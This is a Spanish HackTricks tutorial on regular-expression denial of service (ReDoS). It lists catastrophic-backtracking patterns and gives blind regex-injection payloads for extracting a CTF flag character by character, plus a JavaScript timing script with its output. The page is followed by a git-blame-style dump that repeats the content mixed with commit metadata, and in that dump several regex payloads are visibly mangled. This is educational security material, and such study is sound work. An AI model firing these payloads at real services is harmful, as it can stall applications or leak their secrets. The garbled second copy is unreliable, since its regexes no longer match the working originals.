hacktricks/pentesting-web/regular-expression-denial-of-service-redos.md

# Denegación de Servicio de Expresiones Regulares - ReDoS

<details>

<summary><strong>Aprende hacking en AWS de cero a héroe con</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Otras formas de apoyar a HackTricks:

* Si deseas ver tu **empresa anunciada en HackTricks** o **descargar HackTricks en PDF** Consulta los [**PLANES DE SUSCRIPCIÓN**](https://github.com/sponsors/carlospolop)!
* Obtén el [**oficial PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Descubre [**The PEASS Family**](https://opensea.io/collection/the-peass-family), nuestra colección exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Únete al** 💬 [**grupo de Discord**](https://discord.gg/hRep4RUj7f) o al [**grupo de telegram**](https://t.me/peass) o **síguenos** en **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Comparte tus trucos de hacking enviando PRs a los repositorios de** [**HackTricks**](https://github.com/carlospolop/hacktricks) y [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).

</details>

# Denegación de Servicio de Expresiones Regulares (ReDoS)

Una **Denegación de Servicio de Expresiones Regulares (ReDoS)** ocurre cuando alguien aprovecha las debilidades en cómo funcionan las expresiones regulares (una forma de buscar y hacer coincidir patrones en texto). A veces, cuando se utilizan expresiones regulares, pueden volverse muy lentas, especialmente si el fragmento de texto con el que están trabajando se vuelve más grande. Esta lentitud puede ser tan grave que crece muy rápidamente incluso con pequeños aumentos en el tamaño del texto. Los atacantes pueden aprovechar este problema para hacer que un programa que utiliza expresiones regulares deje de funcionar correctamente durante mucho tiempo.


## El Algoritmo Naïve de Regex Problemático

**Ver los detalles en [https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS)**


## Expresiones Regulares Maliciosas <a href="#evil-regexes" id="evil-regexes"></a>

Un patrón de expresión regular malicioso es aquel que puede **quedarse atascado en una entrada manipulada causando una DoS**. Los patrones de regex maliciosos típicamente contienen agrupaciones con repetición y repetición o alternancia con superposición dentro del grupo repetido. Algunos ejemplos de patrones maliciosos incluyen:

* (a+)+
* ([a-zA-Z]+)*
* (a|aa)+
* (a|a?)+
* (.*a){x} para x > 10

Todos estos son vulnerables a la entrada `aaaaaaaaaaaaaaaaaaaaaaaa!`.

## Cargas Útiles ReDoS

### Extracción de Cadena a través de ReDoS

En un CTF (o recompensa por errores) tal vez **controles la Regex con la que se empareja una información sensible (la bandera)**. Entonces, podría ser útil hacer que la **página se congele (tiempo de espera o tiempo de procesamiento más largo)** si la **Regex coincide** y **no si no lo hace**. De esta manera podrás **extraer** la cadena **carácter por carácter**:

* En [**este post**](https://portswigger.net/daily-swig/blind-regex-injection-theoretical-exploit-offers-new-way-to-force-web-apps-to-spill-secrets) puedes encontrar esta regla ReDoS: `^(?=<flag>)((.*)*)*salt$`
* Ejemplo: `^(?=HTB{sOmE_fl§N§)((.*)*)*salt$`
* En [**este writeup**](https://github.com/jorgectf/Created-CTF-Challenges/blob/main/challenges/TacoMaker%20%40%20DEKRA%20CTF%202022/solver/solver.html) puedes encontrar esta:`<flag>(((((((.*)*)*)*)*)*)*)!`
* En [**este writeup**](https://ctftime.org/writeup/25869) él usó: `^(?=${flag_prefix}).*.*.*.*.*.*.*.*!!!!$`

### Controlando la Entrada y la Regex de ReDoS

Los siguientes son ejemplos de **ReDoS** donde **controlas** tanto la **entrada** como la **regex**:
```javascript
function check_time_regexp(regexp, text){
var t0 = new Date().getTime();;
new RegExp(regexp).test(text);
var t1 = new Date().getTime();;
console.log("Regexp " + regexp + " took " + (t1 - t0) + " milliseconds.")
}

// This payloads work because the input has several "a"s
[
//  "((a+)+)+$",  //Eternal,
//  "(a?){100}$", //Eternal
"(a|a?)+$",
"(\\w*)+$",   //Generic
"(a*)+$",
"(.*a){100}$",
"([a-zA-Z]+)*$", //Generic
"(a+)*$",
].forEach(regexp => check_time_regexp(regexp, "aaaaaaaaaaaaaaaaaaaaaaaaaa!"))

/*
Regexp (a|a?)+$ took 5076 milliseconds.
Regexp (\w*)+$ took 3198 milliseconds.
Regexp (a*)+$ took 3281 milliseconds.
Regexp (.*a){100}$ took 1436 milliseconds.
Regexp ([a-zA-Z]+)*$ took 773 milliseconds.
Regexp (a+)*$ took 723 milliseconds.
*/
```
## Herramientas

* [https://github.com/doyensec/regexploit](https://github.com/doyensec/regexploit)
* [https://devina.io/redos-checker](https://devina.io/redos-checker)

## Referencias
* [https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS)
* [https://portswigger.net/daily-swig/blind-regex-injection-theoretical-exploit-offers-new-way-to-force-web-apps-to-spill-secrets](https://portswigger.net/daily-swig/blind-regex-injection-theoretical-exploit-offers-new-way-to-force-web-apps-to-spill-secrets)
* [https://github.com/jorgectf/Created-CTF-Challenges/blob/main/challenges/TacoMaker%20%40%20DEKRA%20CTF%202022/solver/solver.html](https://github.com/jorgectf/Created-CTF-Challenges/blob/main/challenges/TacoMaker%20%40%20DEKRA%20CTF%202022/solver/solver.html)
* [https://ctftime.org/writeup/25869](https://ctftime.org/writeup/25869)

<details>

<summary><strong>Aprende hacking en AWS de cero a héroe con</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Otras formas de apoyar a HackTricks:

* Si quieres ver tu **empresa anunciada en HackTricks** o **descargar HackTricks en PDF** ¡Consulta los [**PLANES DE SUSCRIPCIÓN**](https://github.com/sponsors/carlospolop)!
* Obtén el [**oficial PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Descubre [**The PEASS Family**](https://opensea.io/collection/the-peass-family), nuestra colección exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Únete al** 💬 [**grupo de Discord**](https://discord.gg/hRep4RUj7f) o al [**grupo de telegram**](https://t.me/peass) o **síguenos** en **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Comparte tus trucos de hacking enviando PRs a los repositorios de** [**HackTricks**](https://github.com/carlospolop/hacktricks) y [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).

</details>
Translated ['forensics/basic-forensic-methodology/pcap-inspection/wiresh 2024-02-06 04:06:30 +00:00			`# Denegación de Servicio de Expresiones Regulares - ReDoS`
f 2023-06-05 18:33:24 +00:00
			`<details>`

Translated ['mobile-pentesting/ios-pentesting/ios-protocol-handlers.md', 2024-02-09 08:10:19 +00:00			`<summary><strong>Aprende hacking en AWS de cero a héroe con</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>`
f 2023-06-05 18:33:24 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-02-03 16:55:47 +00:00			`Otras formas de apoyar a HackTricks:`
f 2023-06-05 18:33:24 +00:00
Translated ['forensics/basic-forensic-methodology/pcap-inspection/wiresh 2024-02-06 04:06:30 +00:00			`* Si deseas ver tu empresa anunciada en HackTricks o descargar HackTricks en PDF Consulta los [PLANES DE SUSCRIPCIÓN](https://github.com/sponsors/carlospolop)!`
			`* Obtén el [oficial PEASS & HackTricks swag](https://peass.creator-spring.com)`
			`* Descubre [The PEASS Family](https://opensea.io/collection/the-peass-family), nuestra colección exclusiva de [NFTs](https://opensea.io/collection/the-peass-family)`
Translated ['mobile-pentesting/ios-pentesting/ios-protocol-handlers.md', 2024-02-09 08:10:19 +00:00			`* Únete al 💬 [grupo de Discord](https://discord.gg/hRep4RUj7f) o al [grupo de telegram](https://t.me/peass) o síguenos en Twitter 🐦 [@carlospolopm](https://twitter.com/hacktricks_live).`
			`* Comparte tus trucos de hacking enviando PRs a los repositorios de [HackTricks](https://github.com/carlospolop/hacktricks) y [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud).`
f 2023-06-05 18:33:24 +00:00
			`</details>`

Translated ['forensics/basic-forensic-methodology/pcap-inspection/wiresh 2024-02-06 04:06:30 +00:00			`# Denegación de Servicio de Expresiones Regulares (ReDoS)`

Translated ['mobile-pentesting/ios-pentesting/ios-protocol-handlers.md', 2024-02-09 08:10:19 +00:00			Una Denegación de Servicio de Expresiones Regulares (ReDoS) ocurre cuando alguien aprovecha las debilidades en cómo funcionan las expresiones regulares (una forma de buscar y hacer coincidir patrones en texto). A veces, cuando se utilizan expresiones regulares, pueden volverse muy lentas, especialmente si el fragmento de texto con el que están trabajando se vuelve más grande. Esta lentitud puede ser tan grave que crece muy rápidamente incluso con pequeños aumentos en el tamaño del texto. Los atacantes pueden aprovechar este problema para hacer que un programa que utiliza expresiones regulares deje de funcionar correctamente durante mucho tiempo.
f 2023-06-05 18:33:24 +00:00

Translated ['forensics/basic-forensic-methodology/pcap-inspection/wiresh 2024-02-06 04:06:30 +00:00			`## El Algoritmo Naïve de Regex Problemático`
f 2023-06-05 18:33:24 +00:00
Translated ['forensics/basic-forensic-methodology/pcap-inspection/wiresh 2024-02-06 04:06:30 +00:00			`Ver los detalles en [https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS)`
f 2023-06-05 18:33:24 +00:00

Translated ['mobile-pentesting/ios-pentesting/ios-protocol-handlers.md', 2024-02-09 08:10:19 +00:00			`## Expresiones Regulares Maliciosas <a href="#evil-regexes" id="evil-regexes"></a>`
f 2023-06-05 18:33:24 +00:00
Translated ['mobile-pentesting/ios-pentesting/ios-protocol-handlers.md', 2024-02-09 08:10:19 +00:00			`Un patrón de expresión regular malicioso es aquel que puede quedarse atascado en una entrada manipulada causando una DoS. Los patrones de regex maliciosos típicamente contienen agrupaciones con repetición y repetición o alternancia con superposición dentro del grupo repetido. Algunos ejemplos de patrones maliciosos incluyen:`
f 2023-06-05 18:33:24 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-02-03 16:55:47 +00:00			`* (a+)+`
			`* ([a-zA-Z]+)*`
			`* (a\|aa)+`
			`* (a\|a?)+`
			`* (.*a){x} para x > 10`
f 2023-06-05 18:33:24 +00:00
Translated ['forensics/basic-forensic-methodology/pcap-inspection/wiresh 2024-02-06 04:06:30 +00:00			Todos estos son vulnerables a la entrada `aaaaaaaaaaaaaaaaaaaaaaaa!`.
f 2023-06-05 18:33:24 +00:00
Translated ['forensics/basic-forensic-methodology/pcap-inspection/wiresh 2024-02-06 04:06:30 +00:00			`## Cargas Útiles ReDoS`
f 2023-06-05 18:33:24 +00:00
Translated ['forensics/basic-forensic-methodology/pcap-inspection/wiresh 2024-02-06 04:06:30 +00:00			`### Extracción de Cadena a través de ReDoS`
f 2023-06-05 18:33:24 +00:00
Translated ['forensics/basic-forensic-methodology/pcap-inspection/wiresh 2024-02-06 04:06:30 +00:00			`En un CTF (o recompensa por errores) tal vez controles la Regex con la que se empareja una información sensible (la bandera). Entonces, podría ser útil hacer que la página se congele (tiempo de espera o tiempo de procesamiento más largo) si la Regex coincide y no si no lo hace. De esta manera podrás extraer la cadena carácter por carácter:`
f 2023-06-05 18:33:24 +00:00
Translated ['forensics/basic-forensic-methodology/pcap-inspection/wiresh 2024-02-06 04:06:30 +00:00			* En [este post](https://portswigger.net/daily-swig/blind-regex-injection-theoretical-exploit-offers-new-way-to-force-web-apps-to-spill-secrets) puedes encontrar esta regla ReDoS: `^(?=<flag>)((.))*salt$`
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-02-03 16:55:47 +00:00			* Ejemplo: `^(?=HTB{sOmE_fl§N§)((.))*salt$`
Translated ['forensics/basic-forensic-methodology/pcap-inspection/wiresh 2024-02-06 04:06:30 +00:00			* En [este writeup](https://github.com/jorgectf/Created-CTF-Challenges/blob/main/challenges/TacoMaker%20%40%20DEKRA%20CTF%202022/solver/solver.html) puedes encontrar esta:`<flag>(((((((.))))))*)!`
			* En [este writeup](https://ctftime.org/writeup/25869) él usó: `^(?=${flag_prefix})........!!!!$`
f 2023-06-05 18:33:24 +00:00
Translated ['forensics/basic-forensic-methodology/pcap-inspection/wiresh 2024-02-06 04:06:30 +00:00			`### Controlando la Entrada y la Regex de ReDoS`
f 2023-06-05 18:33:24 +00:00
Translated ['forensics/basic-forensic-methodology/pcap-inspection/wiresh 2024-02-06 04:06:30 +00:00			`Los siguientes son ejemplos de ReDoS donde controlas tanto la entrada como la regex:`
f 2023-06-05 18:33:24 +00:00			```javascript
			`function check_time_regexp(regexp, text){`
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-02-03 16:55:47 +00:00			`var t0 = new Date().getTime();;`
			`new RegExp(regexp).test(text);`
			`var t1 = new Date().getTime();;`
			`console.log("Regexp " + regexp + " took " + (t1 - t0) + " milliseconds.")`
f 2023-06-05 18:33:24 +00:00			`}`

			`// This payloads work because the input has several "a"s`
			`[`
			`// "((a+)+)+$", //Eternal,`
			`// "(a?){100}$", //Eternal`
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-02-03 16:55:47 +00:00			`"(a\|a?)+$",`
			`"(\\w*)+$", //Generic`
			`"(a*)+$",`
			`"(.*a){100}$",`
			`"([a-zA-Z]+)*$", //Generic`
			`"(a+)*$",`
f 2023-06-05 18:33:24 +00:00			`].forEach(regexp => check_time_regexp(regexp, "aaaaaaaaaaaaaaaaaaaaaaaaaa!"))`

			`/*`
			`Regexp (a\|a?)+$ took 5076 milliseconds.`
			`Regexp (\w*)+$ took 3198 milliseconds.`
			`Regexp (a*)+$ took 3281 milliseconds.`
			`Regexp (.*a){100}$ took 1436 milliseconds.`
			`Regexp ([a-zA-Z]+)*$ took 773 milliseconds.`
			`Regexp (a+)*$ took 723 milliseconds.`
			`*/`
			```
			`## Herramientas`

			`* [https://github.com/doyensec/regexploit](https://github.com/doyensec/regexploit)`
			`* [https://devina.io/redos-checker](https://devina.io/redos-checker)`

Translated ['mobile-pentesting/ios-pentesting/ios-protocol-handlers.md', 2024-02-09 08:10:19 +00:00			`## Referencias`
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-02-03 16:55:47 +00:00			`* [https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS)`
Translated ['forensics/basic-forensic-methodology/pcap-inspection/wiresh 2024-02-06 04:06:30 +00:00			`* [https://portswigger.net/daily-swig/blind-regex-injection-theoretical-exploit-offers-new-way-to-force-web-apps-to-spill-secrets](https://portswigger.net/daily-swig/blind-regex-injection-theoretical-exploit-offers-new-way-to-force-web-apps-to-spill-secrets)`
			`* [https://github.com/jorgectf/Created-CTF-Challenges/blob/main/challenges/TacoMaker%20%40%20DEKRA%20CTF%202022/solver/solver.html](https://github.com/jorgectf/Created-CTF-Challenges/blob/main/challenges/TacoMaker%20%40%20DEKRA%20CTF%202022/solver/solver.html)`
			`* [https://ctftime.org/writeup/25869](https://ctftime.org/writeup/25869)`
f 2023-06-05 18:33:24 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-02-03 16:55:47 +00:00			`<details>`
f 2023-06-05 18:33:24 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-02-03 16:55:47 +00:00			`<summary><strong>Aprende hacking en AWS de cero a héroe con</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>`
f 2023-06-05 18:33:24 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-02-03 16:55:47 +00:00			`Otras formas de apoyar a HackTricks:`
f 2023-06-05 18:33:24 +00:00
Translated ['mobile-pentesting/ios-pentesting/ios-protocol-handlers.md', 2024-02-09 08:10:19 +00:00			`* Si quieres ver tu empresa anunciada en HackTricks o descargar HackTricks en PDF ¡Consulta los [PLANES DE SUSCRIPCIÓN](https://github.com/sponsors/carlospolop)!`
Translated ['forensics/basic-forensic-methodology/pcap-inspection/wiresh 2024-02-06 04:06:30 +00:00			`* Obtén el [oficial PEASS & HackTricks swag](https://peass.creator-spring.com)`
			`* Descubre [The PEASS Family](https://opensea.io/collection/the-peass-family), nuestra colección exclusiva de [NFTs](https://opensea.io/collection/the-peass-family)`
Translated ['mobile-pentesting/ios-pentesting/ios-protocol-handlers.md', 2024-02-09 08:10:19 +00:00			`* Únete al 💬 [grupo de Discord](https://discord.gg/hRep4RUj7f) o al [grupo de telegram](https://t.me/peass) o síguenos en Twitter 🐦 [@carlospolopm](https://twitter.com/hacktricks_live).`
Translated ['forensics/basic-forensic-methodology/pcap-inspection/wiresh 2024-02-06 04:06:30 +00:00			`* Comparte tus trucos de hacking enviando PRs a los repositorios de [HackTricks](https://github.com/carlospolop/hacktricks) y [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud).`
f 2023-06-05 18:33:24 +00:00
			`</details>`